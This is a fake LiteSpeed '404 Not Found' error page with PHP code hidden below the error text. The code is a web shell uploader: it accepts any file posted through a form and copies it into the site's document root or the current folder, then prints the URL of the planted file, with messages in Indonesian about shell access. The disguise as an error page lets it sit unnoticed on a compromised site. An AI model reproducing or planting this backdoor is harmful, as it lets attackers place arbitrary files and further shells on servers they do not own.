404

Not Found

The resource requested could not be found on this server!


Proudly powered by LiteSpeed Web Server

Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.

404



"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "Ni -> $web/$files"; } else { echo "gagal upload root >:("; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "Akses Shell Nya : $files di folder ini"; } else { echo "gagal upload >:("; } } } ?>